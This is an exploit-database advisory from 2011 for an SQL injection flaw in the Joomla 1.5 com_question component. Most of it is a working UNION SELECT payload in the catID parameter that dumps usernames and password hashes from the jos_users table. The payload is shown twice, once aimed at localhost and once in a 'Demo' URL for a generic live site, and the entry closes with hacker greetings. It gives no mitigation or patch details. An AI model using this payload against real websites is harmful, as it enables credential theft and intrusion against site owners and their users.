Joomla Component com_question SQL Injection Vulnerability



EKU-ID: 232 CVE: OSVDB-ID:
Author: NeX HaCkeR Published: 2011-05-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


###################################################
# |Title   : Joomla  (com_question) SQL Injection Vulnerability
# |Vendor  : http://www.alex-ensdorf.de/
# |Version : Joomla 1.5 
# |Date    : 15/5/2011
# |Author  : NeX HaCkEr
# |Contact : Error_log@hotmail.com
##################################################
# | Exploit :
# | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]
# | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all     
# | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Demo:
# | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 
##################################################
# | Greetz :
# | Dr.KAsBeR & DaShEr & MaFiA & WeeD 
##################################################